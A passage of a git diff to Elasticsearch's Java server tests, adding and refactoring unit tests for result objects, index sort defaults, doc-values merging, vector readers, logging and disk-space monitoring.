org.elasticsearch.test.hamcrest.OptionalMatchers.isPresentWith; +import static org.hamcrest.Matchers.is; +import static org.hamcrest.Matchers.sameInstance; + +public class ResultTests extends ESTestCase { + + public void testSuccess() { + final String str = randomAlphaOfLengthBetween(3, 8); + final Result result = Result.of(str); + assertThat(result.isSuccessful(), is(true)); + assertThat(result.isFailure(), is(false)); + assertThat(result.get(), sameInstance(str)); + assertThat(result.failure(), isEmpty()); + assertThat(result.asOptional(), isPresentWith(str)); + } + + public void testFailure() { + final ElasticsearchException exception = new ElasticsearchStatusException( + randomAlphaOfLengthBetween(10, 30), + RestStatus.INTERNAL_SERVER_ERROR + ); + final Result result = Result.failure(exception); + assertThat(result.isSuccessful(), is(false)); + assertThat(result.isFailure(), is(true)); + assertThat(expectThrows(Exception.class, result::get), sameInstance(exception)); + assertThat(result.failure(), isPresentWith(sameInstance(exception))); + assertThat(result.asOptional(), isEmpty()); + } + +} diff --git a/server/src/test/java/org/elasticsearch/common/util/concurrent/AbstractAsyncTaskTests.java b/server/src/test/java/org/elasticsearch/common/util/concurrent/AbstractAsyncTaskTests.java index ec8e0f69d89d8..a193bcd8a89ed 100644 --- a/server/src/test/java/org/elasticsearch/common/util/concurrent/AbstractAsyncTaskTests.java +++ b/server/src/test/java/org/elasticsearch/common/util/concurrent/AbstractAsyncTaskTests.java @@ -59,12 +59,14 @@ protected void runInternal() { try { barrier1.await(); } catch (Exception e) { + logger.error("barrier1 interrupted", e); fail("interrupted"); } count.incrementAndGet(); try { barrier2.await(); } catch (Exception e) { + logger.error("barrier2 interrupted", e); fail("interrupted"); } if (shouldRunThrowException) { @@ -112,6 +114,7 @@ protected void runInternal() { try { barrier.await(); } catch (Exception e) { + logger.error("barrier interrupted", e); fail("interrupted"); } if (shouldRunThrowException) { diff --git a/server/src/test/java/org/elasticsearch/discovery/PeerFinderTests.java b/server/src/test/java/org/elasticsearch/discovery/PeerFinderTests.java index be6af02dbb940..468951b5ae945 100644 --- a/server/src/test/java/org/elasticsearch/discovery/PeerFinderTests.java +++ b/server/src/test/java/org/elasticsearch/discovery/PeerFinderTests.java @@ -23,7 +23,6 @@ import org.elasticsearch.common.transport.TransportAddress; import org.elasticsearch.common.util.concurrent.DeterministicTaskQueue; import org.elasticsearch.tasks.TaskManager; -import org.elasticsearch.telemetry.tracing.Tracer; import org.elasticsearch.test.ESTestCase; import org.elasticsearch.test.MockLog; import org.elasticsearch.test.junit.annotations.TestLogging; @@ -235,8 +234,7 @@ public void setup() { boundTransportAddress -> localNode, null, connectionManager, - new TaskManager(settings, threadPool, emptySet()), - Tracer.NOOP + new TaskManager(settings, threadPool, emptySet()) ); transportService.start(); diff --git a/server/src/test/java/org/elasticsearch/env/NodeRepurposeCommandTests.java b/server/src/test/java/org/elasticsearch/env/NodeRepurposeCommandTests.java index 276c01d041bf8..f5bdf66a96ab7 100644 --- a/server/src/test/java/org/elasticsearch/env/NodeRepurposeCommandTests.java +++ b/server/src/test/java/org/elasticsearch/env/NodeRepurposeCommandTests.java @@ -27,6 +27,7 @@ import org.elasticsearch.index.Index; import org.elasticsearch.index.IndexVersion; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; import org.hamcrest.Matcher; import org.junit.Before; @@ -48,6 +49,7 @@ import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.not; +@WithoutEntitlements // commands don't run with entitlements enforced public class NodeRepurposeCommandTests extends ESTestCase { private static final Index INDEX = new Index("testIndex", "testUUID"); diff --git a/server/src/test/java/org/elasticsearch/env/OverrideNodeVersionCommandTests.java b/server/src/test/java/org/elasticsearch/env/OverrideNodeVersionCommandTests.java index 515561db28232..0308f082e8359 100644 --- a/server/src/test/java/org/elasticsearch/env/OverrideNodeVersionCommandTests.java +++ b/server/src/test/java/org/elasticsearch/env/OverrideNodeVersionCommandTests.java @@ -21,6 +21,7 @@ import org.elasticsearch.common.settings.Settings; import org.elasticsearch.gateway.PersistedClusterStateService; import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.ESTestCase.WithoutEntitlements; import org.junit.After; import org.junit.Before; @@ -31,6 +32,7 @@ import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.equalTo; +@WithoutEntitlements // commands don't run with entitlements enforced public class OverrideNodeVersionCommandTests extends ESTestCase { private Environment environment; diff --git a/server/src/test/java/org/elasticsearch/index/IndexSortSettingsTests.java b/server/src/test/java/org/elasticsearch/index/IndexSortSettingsTests.java index 7221d69b74d46..52cc1348fd48a 100644 --- a/server/src/test/java/org/elasticsearch/index/IndexSortSettingsTests.java +++ b/server/src/test/java/org/elasticsearch/index/IndexSortSettingsTests.java @@ -13,6 +13,7 @@ import org.apache.lucene.search.Sort; import org.elasticsearch.cluster.metadata.IndexMetadata; import org.elasticsearch.common.settings.Settings; +import org.elasticsearch.common.time.DateUtils; import org.elasticsearch.common.util.Maps; import org.elasticsearch.index.fielddata.FieldDataContext; import org.elasticsearch.index.fielddata.IndexFieldData; @@ -30,9 +31,12 @@ import org.elasticsearch.search.sort.SortOrder; import org.elasticsearch.test.ESTestCase; +import java.util.ArrayList; import java.util.Collections; +import java.util.List; import java.util.Map; import java.util.Set; +import java.util.stream.Stream; import static org.elasticsearch.index.IndexSettingsTests.newIndexMeta; import static org.hamcrest.Matchers.arrayWithSize; @@ -174,6 +178,58 @@ public void testSortingAgainstAliasesPre713() { ); } + public void testSortMissingValueDateNanoFieldPre714() { + MappedFieldType tsField = new DateFieldMapper.DateFieldType("@timestamp", true, DateFieldMapper.Resolution.NANOSECONDS); + var indexSettingsBuilder = Settings.builder(); + indexSettingsBuilder.put("index.sort.field", "@timestamp"); + indexSettingsBuilder.put("index.sort.order", "desc"); + + // test with index version 7.13 and before + var pre714Versions = Stream.concat(Stream.of(IndexVersions.V_7_13_0), randomVersionsBefore(IndexVersions.V_7_13_0)).toList(); + for (var version : pre714Versions) { + indexSettingsBuilder.put(IndexMetadata.SETTING_VERSION_CREATED, version); + Sort sort = buildIndexSort(indexSettings(indexSettingsBuilder.build()), Map.of("@timestamp", tsField)); + assertThat(sort.getSort(), arrayWithSize(1)); + assertThat(sort.getSort()[0].getField(), equalTo("@timestamp")); + assertThat(sort.getSort()[0].getMissingValue(), equalTo(Long.MIN_VALUE)); + } + + // now test with index version 7.14 and after + var post713Versions = Stream.concat(Stream.of(IndexVersions.V_7_14_0), randomVersionsAfter(IndexVersions.V_7_14_0)).toList(); + for (var version : post713Versions) { + indexSettingsBuilder.put(IndexMetadata.SETTING_VERSION_CREATED, version); + Sort sort = buildIndexSort(indexSettings(indexSettingsBuilder.build()), Map.of("@timestamp", tsField)); + assertThat(sort.getSort(), arrayWithSize(1)); + assertThat(sort.getSort()[0].getField(), equalTo("@timestamp")); + assertThat(sort.getSort()[0].getMissingValue(), equalTo(0L)); + } + + // asc order has not changed behaviour in any version + indexSettingsBuilder.put("index.sort.order", "asc"); + var allVersions = Stream.concat(post713Versions.stream(), pre714Versions.stream()).toList(); + for (var version : allVersions) { + indexSettingsBuilder.put(IndexMetadata.SETTING_VERSION_CREATED, version); + Sort sort = buildIndexSort(indexSettings(indexSettingsBuilder.build()), Map.of("@timestamp", tsField)); + assertThat(sort.getSort(), arrayWithSize(1)); + assertThat(sort.getSort()[0].getField(), equalTo("@timestamp")); + assertThat(sort.getSort()[0].getMissingValue(), equalTo(DateUtils.MAX_NANOSECOND)); + } + + // ensure no change in behaviour when a missing value is set + indexSettingsBuilder.put("index.sort.missing", "_first"); + for (var version : allVersions) { + indexSettingsBuilder.put(IndexMetadata.SETTING_VERSION_CREATED, version); + Sort sort = buildIndexSort(indexSettings(indexSettingsBuilder.build()), Map.of("@timestamp", tsField)); + assertThat(sort.getSort()[0].getMissingValue(), equalTo(0L)); + } + indexSettingsBuilder.put("index.sort.missing", "_last"); + for (var version : allVersions) { + indexSettingsBuilder.put(IndexMetadata.SETTING_VERSION_CREATED, version); + Sort sort = buildIndexSort(indexSettings(indexSettingsBuilder.build()), Map.of("@timestamp", tsField)); + assertThat(sort.getSort()[0].getMissingValue(), equalTo(Long.MAX_VALUE)); + } + } + public void testTimeSeriesMode() { IndexSettings indexSettings = indexSettings( Settings.builder() @@ -224,4 +280,24 @@ private Sort buildIndexSort(IndexSettings indexSettings, Map randomVersionsBefore(IndexVersion indexVersion) { + var versions = IndexVersions.getAllVersions().stream().filter(v -> v.before(indexVersion)).toList(); + List ret = new ArrayList<>(); + for (int i = 0; i < 10; i++) { + ret.add(randomValueOtherThanMany(ret::contains, () -> randomFrom(versions))); + } + return ret.stream(); + } + + /* Returns a stream of versions after the given version */ + Stream randomVersionsAfter(IndexVersion indexVersion) { + var versions = IndexVersions.getAllVersions().stream().filter(v -> v.after(indexVersion)).toList(); + List ret = new ArrayList<>(); + for (int i = 0; i < 10; i++) { + ret.add(randomValueOtherThanMany(ret::contains, () -> randomFrom(versions))); + } + return ret.stream(); + } } diff --git a/server/src/test/java/org/elasticsearch/index/codec/tsdb/ES87TSDBDocValuesFormatTests.java b/server/src/test/java/org/elasticsearch/index/codec/tsdb/ES87TSDBDocValuesFormatTests.java index a219ebb3740cc..daedfce7b71e1 100644 --- a/server/src/test/java/org/elasticsearch/index/codec/tsdb/ES87TSDBDocValuesFormatTests.java +++ b/server/src/test/java/org/elasticsearch/index/codec/tsdb/ES87TSDBDocValuesFormatTests.java @@ -58,13 +58,13 @@ public class ES87TSDBDocValuesFormatTests extends BaseDocValuesFormatTestCase { LogConfigurator.configureESLogging(); } - static class TestES87TSDBDocValuesFormat extends ES87TSDBDocValuesFormat { + public static class TestES87TSDBDocValuesFormat extends ES87TSDBDocValuesFormat { TestES87TSDBDocValuesFormat() { super(); } - TestES87TSDBDocValuesFormat(int skipIndexIntervalSize) { + public TestES87TSDBDocValuesFormat(int skipIndexIntervalSize) { super(skipIndexIntervalSize); } diff --git a/server/src/test/java/org/elasticsearch/index/codec/tsdb/es819/ES819TSDBDocValuesFormatTests.java b/server/src/test/java/org/elasticsearch/index/codec/tsdb/es819/ES819TSDBDocValuesFormatTests.java index 368d6f23d0fa1..46b46fda11d56 100644 --- a/server/src/test/java/org/elasticsearch/index/codec/tsdb/es819/ES819TSDBDocValuesFormatTests.java +++ b/server/src/test/java/org/elasticsearch/index/codec/tsdb/es819/ES819TSDBDocValuesFormatTests.java @@ -11,6 +11,7 @@ import org.apache.lucene.codecs.Codec; import org.apache.lucene.codecs.DocValuesFormat; +import org.apache.lucene.codecs.lucene90.Lucene90DocValuesFormat; import org.apache.lucene.document.BinaryDocValuesField; import org.apache.lucene.document.Document; import org.apache.lucene.document.NumericDocValuesField; @@ -21,17 +22,29 @@ import org.apache.lucene.index.DocValues; import org.apache.lucene.index.IndexWriter; import org.apache.lucene.index.IndexWriterConfig; +import org.apache.lucene.index.IndexableField; +import org.apache.lucene.index.LeafReader; import org.apache.lucene.index.LogByteSizeMergePolicy; +import org.apache.lucene.index.NumericDocValues; +import org.apache.lucene.index.SortedDocValues; import org.apache.lucene.search.Sort; import org.apache.lucene.search.SortField; import org.apache.lucene.search.SortedNumericSortField; import org.apache.lucene.util.BytesRef; import org.elasticsearch.cluster.metadata.DataStream; +import org.elasticsearch.common.Randomness; +import org.elasticsearch.common.util.CollectionUtils; import org.elasticsearch.index.codec.Elasticsearch900Lucene101Codec; import org.elasticsearch.index.codec.tsdb.ES87TSDBDocValuesFormatTests; +import org.elasticsearch.test.ESTestCase; +import java.io.IOException; +import java.util.ArrayList; import java.util.Arrays; +import java.util.List; import java.util.Locale; +import java.util.function.Supplier; +import java.util.stream.IntStream; public class ES819TSDBDocValuesFormatTests extends ES87TSDBDocValuesFormatTests { @@ -514,6 +527,184 @@ public void testWithNoValueMultiValue() throws Exception { } } + public void testAddIndices() throws IOException { + String timestampField = "@timestamp"; + String hostnameField = "host.name"; + Supplier indexConfigWithRandomDVFormat = () -> { + IndexWriterConfig config = getTimeSeriesIndexWriterConfig(hostnameField, timestampField); + DocValuesFormat dvFormat = switch (random().nextInt(3)) { + case 0 -> new ES87TSDBDocValuesFormatTests.TestES87TSDBDocValuesFormat(random().nextInt(4, 16)); + case 1 -> new ES819TSDBDocValuesFormat(); + case 2 -> new Lucene90DocValuesFormat(); + default -> throw new AssertionError("unknown option"); + }; + config.setCodec(new Elasticsearch900Lucene101Codec() { + @Override + public DocValuesFormat getDocValuesFormatForField(String field) { + return dvFormat; + } + }); + return config; + }; + var allNumericFields = IntStream.range(0, ESTestCase.between(1, 10)).mapToObj(n -> "numeric_" + n).toList(); + var allSortedNumericFields = IntStream.range(0, ESTestCase.between(1, 10)).mapToObj(n -> "sorted_numeric_" + n).toList(); + var allSortedFields = IntStream.range(0, ESTestCase.between(1, 10)).mapToObj(n -> "sorted_" + n).toList(); + var allSortedSetFields = IntStream.range(0, ESTestCase.between(1, 10)).mapToObj(n -> "sorted_set" + n).toList(); + var allBinaryFields = IntStream.range(0, ESTestCase.between(1, 10)).mapToObj(n -> "binary_" + n).toList(); + try (var source1 = newDirectory(); var source2 = newDirectory(); var singleDir = newDirectory(); var mergeDir = newDirectory()) { + try ( + var writer1 = new IndexWriter(source1, indexConfigWithRandomDVFormat.get()); + var writer2 = new IndexWriter(source2, indexConfigWithRandomDVFormat.get()); + var singleWriter = new IndexWriter(singleDir, indexConfigWithRandomDVFormat.get()) + ) { + int numDocs = 1 + random().nextInt(1_000); + long timestamp = random().nextLong(1000_000L); + for (int i = 0; i < numDocs; i++) { + List fields = new ArrayList<>(); + String hostName = String.format(Locale.ROOT, "host-%d", random().nextInt(5)); + timestamp += 1 + random().nextInt(1_000); + fields.add(new SortedDocValuesField(hostnameField, new BytesRef(hostName))); + fields.add(new SortedNumericDocValuesField(timestampField, timestamp)); + var numericFields = ESTestCase.randomSubsetOf(allNumericFields); + for (String f : numericFields) { + fields.add(new NumericDocValuesField(f, random().nextLong(1000L))); + } + var sortedNumericFields = ESTestCase.randomSubsetOf(allSortedNumericFields); + for (String field : sortedNumericFields) { + int valueCount = 1 + random().nextInt(3); + for (int v = 0; v < valueCount; v++) { + fields.add(new SortedNumericDocValuesField(field, random().nextLong(1000L))); + } + } + var sortedFields = ESTestCase.randomSubsetOf(allSortedFields); + for (String field : sortedFields) { + fields.add(new SortedDocValuesField(field, new BytesRef("s" + random().nextInt(100)))); + } + var sortedSetFields = ESTestCase.randomSubsetOf(allSortedSetFields); + for (String field : sortedSetFields) { + int valueCount = 1 + random().nextInt(3); + for (int v = 0; v < valueCount; v++) { + fields.add(new SortedSetDocValuesField(field, new BytesRef("ss" + random().nextInt(100)))); + } + } + List binaryFields = ESTestCase.randomSubsetOf(allBinaryFields); + for (String field : binaryFields) { + fields.add(new BinaryDocValuesField(field, new BytesRef("b" + random().nextInt(100)))); + } + for (IndexWriter writer : List.of(ESTestCase.randomFrom(writer1, writer2), singleWriter)) { + Randomness.shuffle(fields); + writer.addDocument(fields); + if (random().nextInt(100) <= 5) { + writer.commit(); + } + } + } + if (random().nextBoolean()) { + writer1.forceMerge(1); + } + if (random().nextBoolean()) { + writer2.forceMerge(1); + } + singleWriter.commit(); + singleWriter.forceMerge(1); + } + try (var mergeWriter = new IndexWriter(mergeDir, getTimeSeriesIndexWriterConfig(hostnameField, timestampField))) { + mergeWriter.addIndexes(source1, source2); + mergeWriter.forceMerge(1); + } + try (var reader1 = DirectoryReader.open(singleDir); var reader2 = DirectoryReader.open(mergeDir)) { + assertEquals(reader1.maxDoc(), reader2.maxDoc()); + assertEquals(1, reader1.leaves().size()); + assertEquals(1, reader2.leaves().size()); + for (int i = 0; i < reader1.leaves().size(); i++) { + LeafReader leaf1 = reader1.leaves().get(i).reader(); + LeafReader leaf2 = reader2.leaves().get(i).reader(); + for (String f : CollectionUtils.appendToCopy(allSortedNumericFields, timestampField)) { + var dv1 = leaf1.getNumericDocValues(f); + var dv2 = leaf2.getNumericDocValues(f); + if (dv1 == null) { + assertNull(dv2); + continue; + } + assertNotNull(dv2); + while (dv1.nextDoc() != NumericDocValues.NO_MORE_DOCS) { + assertNotEquals(NumericDocValues.NO_MORE_DOCS, dv2.nextDoc()); + assertEquals(dv1.docID(), dv2.docID()); + assertEquals(dv1.longValue(), dv2.longValue()); + } + assertEquals(NumericDocValues.NO_MORE_DOCS, dv2.nextDoc()); + } + for (String f : CollectionUtils.appendToCopy(allSortedNumericFields, timestampField)) { + var dv1 = leaf1.getSortedNumericDocValues(f); + var dv2 = leaf2.getSortedNumericDocValues(f); + if (dv1 == null) { + assertNull(dv2); + continue; + } + assertNotNull(dv2); + while (dv1.nextDoc() != NumericDocValues.NO_MORE_DOCS) { + assertNotEquals(NumericDocValues.NO_MORE_DOCS, dv2.nextDoc()); + assertEquals(dv1.docID(), dv2.docID()); + assertEquals(dv1.docValueCount(), dv2.docValueCount()); + for (int v = 0; v < dv1.docValueCount(); v++) { + assertEquals(dv1.nextValue(), dv2.nextValue()); + } + } + assertEquals(NumericDocValues.NO_MORE_DOCS, dv2.nextDoc()); + } + for (String f : CollectionUtils.appendToCopy(allSortedFields, hostnameField)) { + var dv1 = leaf1.getSortedDocValues(f); + var dv2 = leaf2.getSortedDocValues(f); + if (dv1 == null) { + assertNull(dv2); + continue; + } + assertNotNull(dv2); + while (dv1.nextDoc() != SortedDocValues.NO_MORE_DOCS) { + assertNotEquals(SortedDocValues.NO_MORE_DOCS, dv2.nextDoc()); + assertEquals(dv1.docID(), dv2.docID()); + assertEquals(dv1.lookupOrd(dv1.ordValue()), dv2.lookupOrd(dv2.ordValue())); + } + assertEquals(NumericDocValues.NO_MORE_DOCS, dv2.nextDoc()); + } + for (String f : allSortedSetFields) { + var dv1 = leaf1.getSortedSetDocValues(f); + var dv2 = leaf2.getSortedSetDocValues(f); + if (dv1 == null) { + assertNull(dv2); + continue; + } + assertNotNull(dv2); + while (dv1.nextDoc() != SortedDocValues.NO_MORE_DOCS) { + assertNotEquals(SortedDocValues.NO_MORE_DOCS, dv2.nextDoc()); + assertEquals(dv1.docID(), dv2.docID()); + assertEquals(dv1.docValueCount(), dv2.docValueCount()); + for (int v = 0; v < dv1.docValueCount(); v++) { + assertEquals(dv1.lookupOrd(dv1.nextOrd()), dv2.lookupOrd(dv2.nextOrd())); + } + } + assertEquals(NumericDocValues.NO_MORE_DOCS, dv2.nextDoc()); + } + for (String f : allBinaryFields) { + var dv1 = leaf1.getBinaryDocValues(f); + var dv2 = leaf2.getBinaryDocValues(f); + if (dv1 == null) { + assertNull(dv2); + continue; + } + assertNotNull(dv2); + while (dv1.nextDoc() != SortedDocValues.NO_MORE_DOCS) { + assertNotEquals(SortedDocValues.NO_MORE_DOCS, dv2.nextDoc()); + assertEquals(dv1.docID(), dv2.docID()); + assertEquals(dv1.binaryValue(), dv2.binaryValue()); + } + assertEquals(NumericDocValues.NO_MORE_DOCS, dv2.nextDoc()); + } + } + } + } + } + private IndexWriterConfig getTimeSeriesIndexWriterConfig(String hostnameField, String timestampField) { var config = new IndexWriterConfig(); config.setIndexSort( diff --git a/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormatTests.java b/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormatTests.java index 9a20b56d80ba4..ca4721c354ef9 100644 --- a/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormatTests.java +++ b/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818BinaryQuantizedVectorsFormatTests.java @@ -23,6 +23,7 @@ import org.apache.lucene.codecs.FilterCodec; import org.apache.lucene.codecs.KnnVectorsFormat; import org.apache.lucene.codecs.KnnVectorsReader; +import org.apache.lucene.codecs.lucene99.Lucene99FlatVectorsReader; import org.apache.lucene.codecs.perfield.PerFieldKnnVectorsFormat; import org.apache.lucene.document.Document; import org.apache.lucene.document.Field; @@ -35,6 +36,7 @@ import org.apache.lucene.index.IndexWriterConfig; import org.apache.lucene.index.KnnVectorValues; import org.apache.lucene.index.LeafReader; +import org.apache.lucene.index.SegmentReader; import org.apache.lucene.index.SoftDeletesRetentionMergePolicy; import org.apache.lucene.index.Term; import org.apache.lucene.index.VectorSimilarityFunction; @@ -83,6 +85,7 @@ import static java.lang.String.format; import static org.apache.lucene.index.VectorSimilarityFunction.DOT_PRODUCT; import static org.apache.lucene.search.DocIdSetIterator.NO_MORE_DOCS; +import static org.hamcrest.Matchers.instanceOf; import static org.hamcrest.Matchers.is; import static org.hamcrest.Matchers.oneOf; @@ -309,6 +312,43 @@ public void testSimpleOffHeapSizeImpl(Directory dir, IndexWriterConfig config, b } } + public void testMergeInstance() throws IOException { + checkDirectIOSupported(); + float[] vector = randomVector(10); + VectorSimilarityFunction similarityFunction = randomSimilarity(); + KnnFloatVectorField knnField = new KnnFloatVectorField("field", vector, similarityFunction); + try (Directory dir = newFSDirectory()) { + try (IndexWriter w = new IndexWriter(dir, newIndexWriterConfig().setUseCompoundFile(false))) { + Document doc = new Document(); + knnField.setVectorValue(randomVector(10)); + doc.add(knnField); + w.addDocument(doc); + w.commit(); + + try (IndexReader reader = DirectoryReader.open(w)) { + SegmentReader r = (SegmentReader) getOnlyLeafReader(reader); + assertThat(unwrapRawVectorReader("field", r.getVectorReader()), instanceOf(DirectIOLucene99FlatVectorsReader.class)); + assertThat( + unwrapRawVectorReader("field", r.getVectorReader().getMergeInstance()), + instanceOf(Lucene99FlatVectorsReader.class) + ); + } + } + } + } + + private static KnnVectorsReader unwrapRawVectorReader(String fieldName, KnnVectorsReader knnReader) { + if (knnReader instanceof PerFieldKnnVectorsFormat.FieldsReader perField) { + return unwrapRawVectorReader(fieldName, perField.getFieldReader(fieldName)); + } else if (knnReader instanceof ES818BinaryQuantizedVectorsReader bbqReader) { + return unwrapRawVectorReader(fieldName, bbqReader.getRawVectorsReader()); + } else if (knnReader instanceof MergeReaderWrapper mergeReaderWrapper) { + return unwrapRawVectorReader(fieldName, mergeReaderWrapper.getMainReader()); + } else { + return knnReader; + } + } + static Directory newMMapDirectory() throws IOException { Directory dir = new MMapDirectory(createTempDir("ES818BinaryQuantizedVectorsFormatTests")); if (random().nextBoolean()) { @@ -333,6 +373,7 @@ private Directory newFSDirectory() throws IOException { } static void checkDirectIOSupported() { + assumeTrue("test requires direct IO", ES818BinaryQuantizedVectorsFormat.USE_DIRECT_IO); Path path = createTempDir("directIOProbe"); try (Directory dir = open(path); IndexOutput out = dir.createOutput("out", IOContext.DEFAULT)) { out.writeString("test"); diff --git a/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818HnswBinaryQuantizedVectorsFormatTests.java b/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818HnswBinaryQuantizedVectorsFormatTests.java index 3a4a0d097ea1b..98aed559d9768 100644 --- a/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818HnswBinaryQuantizedVectorsFormatTests.java +++ b/server/src/test/java/org/elasticsearch/index/codec/vectors/es818/ES818HnswBinaryQuantizedVectorsFormatTests.java @@ -221,6 +221,7 @@ private Directory newFSDirectory() throws IOException { } static void checkDirectIOSupported() { + assumeTrue("test requires direct IO", ES818BinaryQuantizedVectorsFormat.USE_DIRECT_IO); Path path = createTempDir("directIOProbe"); try (Directory dir = open(path); IndexOutput out = dir.createOutput("out", IOContext.DEFAULT)) { out.writeString("test"); diff --git a/server/src/test/java/org/elasticsearch/index/engine/InternalEngineTests.java b/server/src/test/java/org/elasticsearch/index/engine/InternalEngineTests.java index 680f6fca9652e..a41a5dd9394b4 100644 --- a/server/src/test/java/org/elasticsearch/index/engine/InternalEngineTests.java +++ b/server/src/test/java/org/elasticsearch/index/engine/InternalEngineTests.java @@ -2534,11 +2534,11 @@ public void testIndexWriterInfoStream() throws IllegalAccessException, IOExcepti MockAppender mockAppender = new MockAppender("testIndexWriterInfoStream"); mockAppender.start(); - Logger rootLogger = LogManager.getRootLogger(); - Level savedLevel = rootLogger.getLevel(); - Loggers.addAppender(rootLogger, mockAppender); - Loggers.setLevel(rootLogger, Level.DEBUG); - rootLogger = LogManager.getRootLogger(); + Logger theLogger = LogManager.getLogger("org.elasticsearch.index"); + Level savedLevel = theLogger.getLevel(); + Loggers.addAppender(theLogger, mockAppender); + Loggers.setLevel(theLogger, Level.DEBUG); + theLogger = LogManager.getLogger("org.elasticsearch.index"); try { // First, with DEBUG, which should NOT log IndexWriter output: @@ -2548,15 +2548,15 @@ public void testIndexWriterInfoStream() throws IllegalAccessException, IOExcepti assertFalse(mockAppender.sawIndexWriterMessage); // Again, with TRACE, which should log IndexWriter output: - Loggers.setLevel(rootLogger, Level.TRACE); + Loggers.setLevel(theLogger, Level.TRACE); engine.index(indexForDoc(doc)); engine.flush(); assertTrue(mockAppender.sawIndexWriterMessage); engine.close(); } finally { - Loggers.removeAppender(rootLogger, mockAppender); + Loggers.removeAppender(theLogger, mockAppender); mockAppender.stop(); - Loggers.setLevel(rootLogger, savedLevel); + Loggers.setLevel(theLogger, savedLevel); } } @@ -2596,10 +2596,10 @@ public void testMergeThreadLogging() throws Exception { final MockMergeThreadAppender mockAppender = new MockMergeThreadAppender("testMergeThreadLogging"); mockAppender.start(); - Logger rootLogger = LogManager.getRootLogger(); - Level savedLevel = rootLogger.getLevel(); - Loggers.addAppender(rootLogger, mockAppender); - Loggers.setLevel(rootLogger, Level.TRACE); + Logger theLogger = LogManager.getLogger("org.elasticsearch.index"); + Level savedLevel = theLogger.getLevel(); + Loggers.addAppender(theLogger, mockAppender); + Loggers.setLevel(theLogger, Level.TRACE); try { LogMergePolicy lmp = newLogMergePolicy(); lmp.setMergeFactor(2); @@ -2632,12 +2632,12 @@ public void testMergeThreadLogging() throws Exception { assertThat(mockAppender.mergeCompleted(), is(true)); }); - Loggers.setLevel(rootLogger, savedLevel); + Loggers.setLevel(theLogger, savedLevel); engine.close(); } } finally { - Loggers.setLevel(rootLogger, savedLevel); - Loggers.removeAppender(rootLogger, mockAppender); + Loggers.setLevel(theLogger, savedLevel); + Loggers.removeAppender(theLogger, mockAppender); mockAppender.stop(); } } diff --git a/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceDiskSpaceTests.java b/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceDiskSpaceTests.java index 8a497d09320ff..cc8d56c2fb37b 100644 --- a/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceDiskSpaceTests.java +++ b/server/src/test/java/org/elasticsearch/index/engine/ThreadPoolMergeExecutorServiceDiskSpaceTests.java @@ -14,6 +14,7 @@ import org.elasticsearch.common.settings.ClusterSettings; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.common.unit.ByteSizeValue; +import org.elasticsearch.common.util.concurrent.ConcurrentCollections; import org.elasticsearch.common.util.concurrent.EsExecutors; import org.elasticsearch.core.PathUtils; import org.elasticsearch.core.PathUtilsForTesting; @@ -27,8 +28,7 @@ import org.elasticsearch.threadpool.TestThreadPool; import org.elasticsearch.threadpool.ThreadPool; import org.junit.After; -import org.junit.AfterClass; -import org.junit.BeforeClass; +import org.junit.Before; import java.io.IOException; import java.nio.file.FileStore; @@ -41,6 +41,7 @@ import java.util.IdentityHashMap; import java.util.LinkedHashSet; import java.util.List; +import java.util.Set; import java.util.concurrent.CountDownLatch; import java.util.concurrent.Executor; import java.util.concurrent.TimeUnit; @@ -59,8 +60,8 @@ public class ThreadPoolMergeExecutorServiceDiskSpaceTests extends ESTestCase { - private static TestMockFileStore aFileStore = new TestMockFileStore("mocka"); - private static TestMockFileStore bFileStore = new TestMockFileStore("mockb"); + private static TestMockFileStore aFileStore; + private static TestMockFileStore bFileStore; private static String aPathPart; private static String bPathPart; private static int mergeExecutorThreadCount; @@ -69,8 +70,10 @@ public class ThreadPoolMergeExecutorServiceDiskSpaceTests extends ESTestCase { private static NodeEnvironment nodeEnvironment; private static boolean setThreadPoolMergeSchedulerSetting; - @BeforeClass - public static void installMockUsableSpaceFS() throws Exception { + @Before + public void setupTestEnv() throws Exception { + aFileStore = new TestMockFileStore("mocka"); + bFileStore = new TestMockFileStore("mockb"); FileSystem current = PathUtils.getDefaultFileSystem(); aPathPart = "a-" + randomUUID(); bPathPart = "b-" + randomUUID(); @@ -96,8 +99,14 @@ public static void installMockUsableSpaceFS() throws Exception { nodeEnvironment = new NodeEnvironment(settings, TestEnvironment.newEnvironment(settings)); } - @AfterClass - public static void removeMockUsableSpaceFS() { + @After + public void removeMockUsableSpaceFS() { + if (setThreadPoolMergeSchedulerSetting) { + assertWarnings( + "[indices.merge.scheduler.use_thread_pool] setting was deprecated in Elasticsearch " + + "and will be removed in a future release. See the breaking changes documentation for the next major version." + ); + } PathUtilsForTesting.teardown(); aFileStore = null; bFileStore = null; @@ -105,11 +114,6 @@ public static void removeMockUsableSpaceFS() { nodeEnvironment.close(); } - @After - public void cleanupThreadPool() { - testThreadPool.scheduledTasks.clear(); - } - static class TestCapturingThreadPool extends TestThreadPool { final List> scheduledTasks = new ArrayList<>(); @@ -319,8 +323,6 @@ public void testDiskSpaceMonitorStartsAsDisabled() throws Exception { ) ); } - aFileStore.throwIoException = false; - bFileStore.throwIoException = false; } public void testAvailableDiskSpaceMonitorWhenFileSystemStatErrors() throws Exception { @@ -406,8 +408,6 @@ public void testAvailableDiskSpaceMonitorWhenFileSystemStatErrors() throws Excep } }); } - aFileStore.throwIoException = false; - bFileStore.throwIoException = false; } public void testAvailableDiskSpaceMonitorSettingsUpdate() throws Exception { @@ -516,12 +516,6 @@ public void testAvailableDiskSpaceMonitorSettingsUpdate() throws Exception { } }, 5, TimeUnit.SECONDS); } - if (setThreadPoolMergeSchedulerSetting) { - assertWarnings( - 